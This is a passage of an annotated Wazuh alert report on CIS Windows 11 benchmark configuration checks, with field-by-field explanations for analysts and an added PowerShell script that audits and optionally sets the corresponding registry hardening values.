rule.gdpr:  ['IV_35.7.d']
General Data Protection Regulation relevance.

rule.pci_dss:  ['2.2', '10.4']
PCI DSS mapping – card‑holder data rules.

rule.nist_800_53:  ['CM.1', 'AU.8']
NIST 800‑53 mapping – US Fed controls.

rule.tsc:  ['CC7.1', 'CC7.2', 'CC7.2']
SOC‑2 Trust Services Criteria tag.

rule.cis:  ['18.8.53.1.2']
Maps to CIS benchmark controls – governance folks love this.

rule.cis_csc:  ['8.4']
CIS Critical Security Controls safeguard the benchmark item implements: the vendor-neutral control, as opposed to the OS-specific item in rule.cis. Use it to track the same control across Windows and Linux policies.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745535009.2483175
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  sca
Name of the Wazuh decoder that parsed this raw log.

data.sca.type:  check
SCA event type. check = the result of one benchmark item (this event); summary = the per-policy pass/fail totals sent at the end of the scan. It says nothing about how the item is evaluated; see data.sca.check.registry for that.

data.sca.scan_id:  1948494698
Session ID grouping all checks from the same run.

data.sca.policy:  CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0
Name of the benchmark policy (e.g., CIS Ubuntu 20.04).

data.sca.check.id:  26276
Unique ID for this single check – copy to search historic runs.

data.sca.check.title:  Ensure 'Enable Windows NTP Server' is set to 'Disabled'.
Headline of the secure‑config test (e.g., ‘Ensure password max‑age ≤ 365’).

data.sca.check.description:  This policy setting allows you to specify whether the Windows NTP Server is enabled. The recommended state for this setting is: Disabled.
Detailed what/why of the check – great learning resource.

data.sca.check.rationale:  The configuration of proper time synchronization is critically important in an enterprise managed environment both due to the sensitivity of Kerberos authentication timestamps and also to ensure accurate security logging.
Why this matters (compliance / security impact).

data.sca.check.remediation:  To establish the recommended configuration via GP, set the following UI path to Disabled: Computer Configuration\Policies\Administrative Templates\System\Windows Time Service\Time Providers\Enable Windows NTP Server. Note: This Group Policy path is provided by the Group Policy template W32Time.admx/adml that is included with all versions of the Microsoft Windows Administrative Templates.
Vendor‑recommended fix text – copy‑paste for hardening tickets.

data.sca.check.compliance.cis:  18.8.53.1.2
CIS Benchmark recommendation number this check implements. Same value as rule.cis, and the section to open in the benchmark for the full audit and remediation procedure.

data.sca.check.compliance.cis_csc:  8.4
CIS Controls safeguard for this individual check (same mapping as rule.cis_csc).

data.sca.check.compliance.pci_dss:  10.4
PCI DSS requirement this individual check satisfies (rule.pci_dss above is the union the Wazuh rule carries).

data.sca.check.compliance.nist_800_53:  AU.8
NIST SP 800-53 control this individual check maps to.

data.sca.check.compliance.tsc:  CC7.2
SOC 2 Trust Services Criteria reference for this individual check.

data.sca.check.registry:  ['HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\W32Time\\TimeProviders\\NtpServer']
Registry key the SCA policy reads to decide pass/fail. The value name and expected data are in the policy file on the manager, not in the alert. Verify the fix against this key on the host; the GP UI path in the remediation text is only what writes it.

data.sca.check.result:  passed
passed, failed or not applicable. This one passed: the host already matches the benchmark, so no action is needed. Wazuh still emits it (rule 19008, level 3) so you can show the check ran; a failed check arrives as rule 19007, level 7.

location:  sca
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  3
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Low
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  No strong indicators
Short human reason we chose that label.

🎯 Recommended Actions

CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Block launching Universal Windows apps with Windows Runtime API access from hosted content.' is set to 'Enabled'.

🧠 What happened? CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Block launching Universal Windows apps with Windows Runtime API access from hosted content.' is set to 'Enabled'.

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:50:09.563+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:50:09.563+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  7
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Block launching Universal Windows apps with Windows Runtime API access from hosted content.' is set to 'Enabled'.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  19007
Numeric ID of the detection rule that fired.

rule.firedtimes:  5
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sca']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.gdpr:  ['IV_35.7.d']
General Data Protection Regulation relevance.

rule.pci_dss:  ['2.2']
PCI DSS mapping – card‑holder data rules.

rule.nist_800_53:  ['CM.1']
NIST 800‑53 mapping – US Fed controls.

rule.tsc:  ['CC7.1', 'CC7.2']
SOC‑2 Trust Services Criteria tag.

rule.cis:  ['18.9.6.2']
Maps to CIS benchmark controls – governance folks love this.

rule.cis_csc:  ['2.5']
CIS Critical Security Controls safeguard the benchmark item implements: the vendor-neutral control, as opposed to the OS-specific item in rule.cis. Use it to track the same control across Windows and Linux policies.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745535009.2486361
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  sca
Name of the Wazuh decoder that parsed this raw log.

data.sca.type:  check
SCA event type. check = the result of one benchmark item (this event); summary = the per-policy pass/fail totals sent at the end of the scan. It says nothing about how the item is evaluated; see data.sca.check.registry for that.

data.sca.scan_id:  1948494698
Session ID grouping all checks from the same run.

data.sca.policy:  CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0
Name of the benchmark policy (e.g., CIS Ubuntu 20.04).

data.sca.check.id:  26281
Unique ID for this single check – copy to search historic runs.

data.sca.check.title:  Ensure 'Block launching Universal Windows apps with Windows Runtime API access from hosted content.' is set to 'Enabled'.
Headline of the secure‑config test (e.g., ‘Ensure password max‑age ≤ 365’).

data.sca.check.description:  This policy setting controls whether Microsoft Store apps with Windows Runtime API access directly from web content can be launched. The recommended state for this setting is: Enabled.
Detailed what/why of the check – great learning resource.

data.sca.check.rationale:  Blocking apps from the web with direct access to the Windows API can prevent malicious apps from being run on a system. Only system administrators should be installing approved applications.
Why this matters (compliance / security impact).

data.sca.check.remediation:  To establish the recommended configuration via GP, set the following UI path to Enabled: Computer Configuration\Policies\Administrative Templates\Windows Components\App runtime\Block launching Universal Windows apps with Windows Runtime API access from hosted content. Note: A reboot may be required after the setting is applied. Note #2: This Group Policy path may not exist by default. It is provided by the Group Policy template AppXRuntime.admx/adml that is included with the Microsoft Windows 10 RTM (Release 1507) Administrative Templates (or newer). Note #3: In older Microsoft Windows Administrative Templates, this setting was initially named Block launching Windows Store apps with Windows Runtime API access from hosted content., but it was renamed starting with the Windows 10 Release 1803 Administrative Templates
Vendor‑recommended fix text – copy‑paste for hardening tickets.

data.sca.check.compliance.cis:  18.9.6.2
CIS Benchmark recommendation number this check implements. Same value as rule.cis, and the section to open in the benchmark for the full audit and remediation procedure.

data.sca.check.compliance.cis_csc:  2.5
CIS Controls safeguard for this individual check (same mapping as rule.cis_csc).

data.sca.check.registry:  ['HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System']
Registry key the SCA policy reads to decide pass/fail. The value name and expected data are in the policy file on the manager, not in the alert. Verify the fix against this key on the host; the GP UI path in the remediation text is only what writes it.

data.sca.check.result:  failed
passed, failed or not applicable. failed means the host deviates from the benchmark and Wazuh raises it as rule 19007 at level 7 (a passed check is rule 19008 at level 3); open a hardening ticket.

location:  sca
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Disallow Autoplay for non-volume devices' is set to 'Enabled'.

🧠 What happened? CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Disallow Autoplay for non-volume devices' is set to 'Enabled'.

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:50:09.588+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:50:09.588+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  7
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Disallow Autoplay for non-volume devices' is set to 'Enabled'.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  19007
Numeric ID of the detection rule that fired.

rule.firedtimes:  6
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sca']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.gdpr:  ['IV_35.7.d']
General Data Protection Regulation relevance.

rule.pci_dss:  ['2.2', '2.2.4']
PCI DSS mapping – card‑holder data rules.

rule.nist_800_53:  ['CM.1', 'CM.1']
NIST 800‑53 mapping – US Fed controls.

rule.tsc:  ['CC7.1', 'CC7.2', 'CC5.2']
SOC‑2 Trust Services Criteria tag.

rule.cis:  ['18.9.8.1']
Maps to CIS benchmark controls – governance folks love this.

rule.cis_csc:  ['10.3']
CIS Critical Security Controls safeguard the benchmark item implements: the vendor-neutral control, as opposed to the OS-specific item in rule.cis. Use it to track the same control across Windows and Linux policies.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745535009.2490499
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  sca
Name of the Wazuh decoder that parsed this raw log.

data.sca.type:  check
SCA event type. check = the result of one benchmark item (this event); summary = the per-policy pass/fail totals sent at the end of the scan. It says nothing about how the item is evaluated; see data.sca.check.registry for that.

data.sca.scan_id:  1948494698
Session ID grouping all checks from the same run.

data.sca.policy:  CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0
Name of the benchmark policy (e.g., CIS Ubuntu 20.04).

data.sca.check.id:  26282
Unique ID for this single check – copy to search historic runs.

data.sca.check.title:  Ensure 'Disallow Autoplay for non-volume devices' is set to 'Enabled'.
Headline of the secure‑config test (e.g., ‘Ensure password max‑age ≤ 365’).

data.sca.check.description:  This policy setting disallows AutoPlay for MTP devices like cameras or phones. The recommended state for this setting is: Enabled.
Detailed what/why of the check – great learning resource.

data.sca.check.rationale:  An attacker could use this feature to launch a program to damage a client computer or data on the computer.
Why this matters (compliance / security impact).

data.sca.check.remediation:  To establish the recommended configuration via GP, set the following UI path to Enabled: Computer Configuration\Policies\Administrative Templates\Windows Components\AutoPlay Policies\Disallow Autoplay for non-volume devices. Note: This Group Policy path may not exist by default. It is provided by the Group Policy template AutoPlay.admx/adml that is included with the Microsoft Windows 8.0 & Server 2012 (non-R2) Administrative Templates (or newer).
Vendor‑recommended fix text – copy‑paste for hardening tickets.

data.sca.check.compliance.cis:  18.9.8.1
CIS Benchmark recommendation number this check implements. Same value as rule.cis, and the section to open in the benchmark for the full audit and remediation procedure.

data.sca.check.compliance.cis_csc:  10.3
CIS Controls safeguard for this individual check (same mapping as rule.cis_csc).

data.sca.check.compliance.pci_dss:  2.2.4
PCI DSS requirement this individual check satisfies (rule.pci_dss above is the union the Wazuh rule carries).

data.sca.check.compliance.nist_800_53:  CM.1
NIST SP 800-53 control this individual check maps to.

data.sca.check.compliance.tsc:  CC5.2
SOC 2 Trust Services Criteria reference for this individual check.

data.sca.check.registry:  ['HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\Explorer']
Registry key the SCA policy reads to decide pass/fail. The value name and expected data are in the policy file on the manager, not in the alert. Verify the fix against this key on the host; the GP UI path in the remediation text is only what writes it.

data.sca.check.result:  failed
passed, failed or not applicable. failed means the host deviates from the benchmark and Wazuh raises it as rule 19007 at level 7 (a passed check is rule 19008 at level 3); open a hardening ticket.

location:  sca
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Set the default behavior for AutoRun' is set to 'Enabled: Do not execute any autorun commands'.

🧠 What happened? CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Set the default behavior for AutoRun' is set to 'Enabled: Do not execute any autorun commands'.

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:50:09.589+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:50:09.589+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  7
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Set the default behavior for AutoRun' is set to 'Enabled: Do not execute any autorun commands'.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  19007
Numeric ID of the detection rule that fired.

rule.firedtimes:  7
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sca']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.gdpr:  ['IV_35.7.d']
General Data Protection Regulation relevance.

rule.pci_dss:  ['2.2', '2.2.4']
PCI DSS mapping – card‑holder data rules.

rule.nist_800_53:  ['CM.1', 'CM.1']
NIST 800‑53 mapping – US Fed controls.

rule.tsc:  ['CC7.1', 'CC7.2', 'CC5.2']
SOC‑2 Trust Services Criteria tag.

rule.cis:  ['18.9.8.2']
Maps to CIS benchmark controls – governance folks love this.

rule.cis_csc:  ['10.3']
CIS Critical Security Controls safeguard the benchmark item implements: the vendor-neutral control, as opposed to the OS-specific item in rule.cis. Use it to track the same control across Windows and Linux policies.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745535009.2493544
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  sca
Name of the Wazuh decoder that parsed this raw log.

data.sca.type:  check
SCA event type. check = the result of one benchmark item (this event); summary = the per-policy pass/fail totals sent at the end of the scan. It says nothing about how the item is evaluated; see data.sca.check.registry for that.

data.sca.scan_id:  1948494698
Session ID grouping all checks from the same run.

data.sca.policy:  CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0
Name of the benchmark policy (e.g., CIS Ubuntu 20.04).

data.sca.check.id:  26283
Unique ID for this single check – copy to search historic runs.

data.sca.check.title:  Ensure 'Set the default behavior for AutoRun' is set to 'Enabled: Do not execute any autorun commands'.
Headline of the secure‑config test (e.g., ‘Ensure password max‑age ≤ 365’).

data.sca.check.description:  This policy setting sets the default behavior for Autorun commands. Autorun commands are generally stored in autorun.inf files. They often launch the installation program or other routines. The recommended state for this setting is: Enabled: Do not execute any autorun commands.
Detailed what/why of the check – great learning resource.

data.sca.check.rationale:  Prior to Windows Vista, when media containing an autorun command is inserted, the system will automatically execute the program without user intervention. This creates a major security concern as code may be executed without user's knowledge. The default behavior starting with Windows Vista is to prompt the user whether autorun command is to be run. The autorun command is represented as a handler in the Autoplay dialog.
Why this matters (compliance / security impact).

data.sca.check.remediation:  To establish the recommended configuration via GP, set the following UI path to Enabled: Do not execute any autorun commands: Computer Configuration\Policies\Administrative Templates\Windows Components\AutoPlay Policies\Set the default behavior for AutoRun. Note: This Group Policy path may not exist by default. It is provided by the Group Policy template AutoPlay.admx/adml that is included with the Microsoft Windows 8.0 & Server 2012 (non-R2) Administrative Templates (or newer).
Vendor‑recommended fix text – copy‑paste for hardening tickets.

data.sca.check.compliance.cis:  18.9.8.2
CIS Benchmark recommendation number this check implements. Same value as rule.cis, and the section to open in the benchmark for the full audit and remediation procedure.

data.sca.check.compliance.cis_csc:  10.3
CIS Controls safeguard for this individual check (same mapping as rule.cis_csc).

data.sca.check.compliance.pci_dss:  2.2.4
PCI DSS requirement this individual check satisfies (rule.pci_dss above is the union the Wazuh rule carries).

data.sca.check.compliance.nist_800_53:  CM.1
NIST SP 800-53 control this individual check maps to.

data.sca.check.compliance.tsc:  CC5.2
SOC 2 Trust Services Criteria reference for this individual check.

data.sca.check.registry:  ['HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer']
Registry key the SCA policy reads to decide pass/fail. The value name and expected data are in the policy file on the manager, not in the alert. Verify the fix against this key on the host; the GP UI path in the remediation text is only what writes it.

data.sca.check.result:  failed
passed, failed or not applicable. failed means the host deviates from the benchmark and Wazuh raises it as rule 19007 at level 7 (a passed check is rule 19008 at level 3); open a hardening ticket.

location:  sca
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Configure enhanced anti-spoofing' is set to 'Enabled'.

🧠 What happened? CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Configure enhanced anti-spoofing' is set to 'Enabled'.

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:50:09.611+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:50:09.611+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  7
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Configure enhanced anti-spoofing' is set to 'Enabled'.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  19007
Numeric ID of the detection rule that fired.

rule.firedtimes:  8
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sca']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.gdpr:  ['IV_35.7.d']
General Data Protection Regulation relevance.

rule.pci_dss:  ['2.2', '8.1']
PCI DSS mapping – card‑holder data rules.

rule.nist_800_53:  ['CM.1']
NIST 800‑53 mapping – US Fed controls.

rule.tsc:  ['CC7.1', 'CC7.2', 'CC6.1']
SOC‑2 Trust Services Criteria tag.

rule.cis:  ['18.9.10.1.1']
Maps to CIS benchmark controls – governance folks love this.

rule.cis_csc:  ['10.5']
CIS Critical Security Controls safeguard the benchmark item implements: the vendor-neutral control, as opposed to the OS-specific item in rule.cis. Use it to track the same control across Windows and Linux policies.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745535009.2497736
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  sca
Name of the Wazuh decoder that parsed this raw log.

data.sca.type:  check
SCA event type. check = the result of one benchmark item (this event); summary = the per-policy pass/fail totals sent at the end of the scan. It says nothing about how the item is evaluated; see data.sca.check.registry for that.

data.sca.scan_id:  1948494698
Session ID grouping all checks from the same run.

data.sca.policy:  CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0
Name of the benchmark policy (e.g., CIS Ubuntu 20.04).

data.sca.check.id:  26285
Unique ID for this single check – copy to search historic runs.

data.sca.check.title:  Ensure 'Configure enhanced anti-spoofing' is set to 'Enabled'.
Headline of the secure‑config test (e.g., ‘Ensure password max‑age ≤ 365’).

data.sca.check.description:  This policy setting determines whether enhanced anti-spoofing is configured for devices which support it. The recommended state for this setting is: Enabled.
Detailed what/why of the check – great learning resource.

data.sca.check.rationale:  Enterprise managed environments are now supporting a wider range of mobile devices, increasing the security on these devices will help protect against unauthorized access on your network.
Why this matters (compliance / security impact).

data.sca.check.remediation:  To establish the recommended configuration via GP, set the following UI path to Enabled: Computer Configuration\Policies\Administrative Templates\Windows Components\Biometrics\Facial Features\Configure enhanced anti-spoofing. Note: This Group Policy path may not exist by default. It is provided by the Group Policy template Biometrics.admx/adml that is included with the Microsoft Windows 10 Release 1511 Administrative Templates (or newer). Note #2: In the Windows 10 Release 1511 and Windows 10 Release 1607 & Server 2016 Administrative Templates, this setting was initially named Use enhanced anti-spoofing when available. It was renamed to Configure enhanced anti-spoofing starting with the Windows 10 Release 1703 Administrative Templates.
Vendor‑recommended fix text – copy‑paste for hardening tickets.

data.sca.check.compliance.cis:  18.9.10.1.1
CIS Benchmark recommendation number this check implements. Same value as rule.cis, and the section to open in the benchmark for the full audit and remediation procedure.

data.sca.check.compliance.cis_csc:  10.5
CIS Controls safeguard for this individual check (same mapping as rule.cis_csc).

data.sca.check.compliance.pci_dss:  8.1
PCI DSS requirement this individual check satisfies (rule.pci_dss above is the union the Wazuh rule carries).

data.sca.check.compliance.tsc:  CC6.1
SOC 2 Trust Services Criteria reference for this individual check.

data.sca.check.registry:  ['HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Biometrics\\FacialFeatures']
Registry key the SCA policy reads to decide pass/fail. The value name and expected data are in the policy file on the manager, not in the alert. Verify the fix against this key on the host; the GP UI path in the remediation text is only what writes it.

data.sca.check.result:  failed
passed, failed or not applicable. failed means the host deviates from the benchmark and Wazuh raises it as rule 19007 at level 7 (a passed check is rule 19008 at level 3); open a hardening ticket.

location:  sca
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions
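The six CIS checks above (five failed, the NTP one passed) all reduce to one registry key on the host, which is what data.sca.check.registry names and what the agent actually reads. The script below is an added example for this report, not SOCscribe, Wazuh or CIS code: it audits those keys on the endpoint and, with -Remediate, writes the benchmark value so the next SCA scan reports them as passed. The registry key for each entry is taken from the alerts; the value name and expected DWORD data are not in the alerts and are assumptions taken from the CIS benchmark audit procedure for each item, so confirm them against your copy of the benchmark or the SCA policy file on the manager before enforcing. The check ids (26265 and so on) are the data.sca.check.id values from the alerts.

```powershell
# Added example; not SOCscribe, Wazuh or CIS code. Run in an elevated PowerShell
# on the endpoint (agent 001 'Attacker' above). Keys come from
# data.sca.check.registry in the alerts (HKEY_LOCAL_MACHINE written as HKLM:).
# ASSUMPTION: value names and expected data are taken from the CIS benchmark
# audit procedure for each item and are not present in the alerts.
[CmdletBinding()]
param([switch]$Remediate)   # audit only by default; -Remediate writes the values

function New-Check {
    param([string]$Cis, [int]$ScaId, [string]$Key, [string]$Name, [int]$Expected)
    [pscustomobject]@{ Cis = $Cis; ScaId = $ScaId; Key = $Key; Name = $Name; Expected = $Expected }
}

$Checks = @(
    # 18.8.34.6.2 Allow network connectivity during connected-standby (plugged in) = Disabled
    New-Check '18.8.34.6.2' 26265 'HKLM:\SOFTWARE\Policies\Microsoft\Power\PowerSettings\f15576e8-98b7-4186-b944-eafa664402d9' 'ACSettingIndex' 0
    # 18.8.53.1.2 Enable Windows NTP Server = Disabled (the alert reports this one as passed)
    New-Check '18.8.53.1.2' 26276 'HKLM:\SOFTWARE\Policies\Microsoft\W32Time\TimeProviders\NtpServer' 'Enabled' 0
    # 18.9.6.2 Block launching Universal Windows apps with Windows Runtime API access from hosted content = Enabled
    New-Check '18.9.6.2'    26281 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System' 'BlockHostedAppAccessWinRT' 1
    # 18.9.8.1 Disallow Autoplay for non-volume devices = Enabled
    New-Check '18.9.8.1'    26282 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\Explorer' 'NoAutoplayfornonVolume' 1
    # 18.9.8.2 Set the default behavior for AutoRun = Enabled: Do not execute any autorun commands
    New-Check '18.9.8.2'    26283 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer' 'NoAutorun' 1
    # 18.9.10.1.1 Configure enhanced anti-spoofing = Enabled
    New-Check '18.9.10.1.1' 26285 'HKLM:\SOFTWARE\Policies\Microsoft\Biometrics\FacialFeatures' 'EnhancedAntiSpoofing' 1
)

function Test-CisRegistryCheck {
    # Reads the key the SCA policy reads and returns passed/failed the same way
    # the agent does: a missing key or value is 'failed', because an unconfigured
    # policy is exactly what the alerts above report.
    param([Parameter(Mandatory)]$Check)
    $actual = $null
    if (Test-Path -LiteralPath $Check.Key) {
        $props = Get-ItemProperty -LiteralPath $Check.Key -ErrorAction SilentlyContinue
        if ($null -ne $props -and $null -ne $props.PSObject.Properties[$Check.Name]) {
            $actual = [int]$props.($Check.Name)
        }
    }
    $result = if ($null -ne $actual -and $actual -eq $Check.Expected) { 'passed' } else { 'failed' }
    [pscustomobject]@{
        CIS      = $Check.Cis
        ScaCheck = $Check.ScaId
        Value    = $Check.Name
        Expected = $Check.Expected
        Actual   = $actual
        Result   = $result
    }
}

function Set-CisRegistryCheck {
    # Writes the benchmark value directly (creating the key path if needed).
    param([Parameter(Mandatory)]$Check)
    if (-not (Test-Path -LiteralPath $Check.Key)) {
        New-Item -Path $Check.Key -Force | Out-Null   # -Force creates intermediate keys
    }
    New-ItemProperty -LiteralPath $Check.Key -Name $Check.Name -PropertyType DWord `
        -Value $Check.Expected -Force | Out-Null
}

$before = foreach ($c in $Checks) { Test-CisRegistryCheck -Check $c }
$before | Format-Table CIS, ScaCheck, Value, Expected, Actual, Result -AutoSize

if ($Remediate) {
    foreach ($r in ($before | Where-Object Result -eq 'failed')) {
        Set-CisRegistryCheck -Check ($Checks | Where-Object ScaId -eq $r.ScaCheck)
    }
    # Re-audit so the hardening ticket records before/after state.
    $after = foreach ($c in $Checks) { Test-CisRegistryCheck -Check $c }
    $after | Format-Table CIS, ScaCheck, Value, Expected, Actual, Result -AutoSize
}
```

Two caveats a practitioner should keep in mind. Values under HKLM\SOFTWARE\Policies are normally written by Group Policy, so on a domain-joined machine use the GP path given in each remediation field and let policy refresh write the key; setting it by hand there only satisfies the SCA check until the next GP refresh overwrites it. Writing directly, as this script does, is appropriate for a standalone or lab host such as the one in these alerts. After remediation, force an SCA rescan (SCA runs at agent start and at its configured interval) and confirm that the same data.sca.check.id values now arrive as rule 19008 with result passed under a new data.sca.scan_id; that pair of alerts is the evidence to attach to the ticket.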

CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Allow Use of Camera' is set to 'Disabled'.

🧠 What happened? CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Allow Use of Camera' is set to 'Disabled'.

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:50:09.612+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:50:09.612+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  7
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Allow Use of Camera' is set to 'Disabled'.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  19007
Numeric ID of the detection rule that fired.

rule.firedtimes:  9
How many times this exact rule hit during aggregation. High = repetitive behaviour.

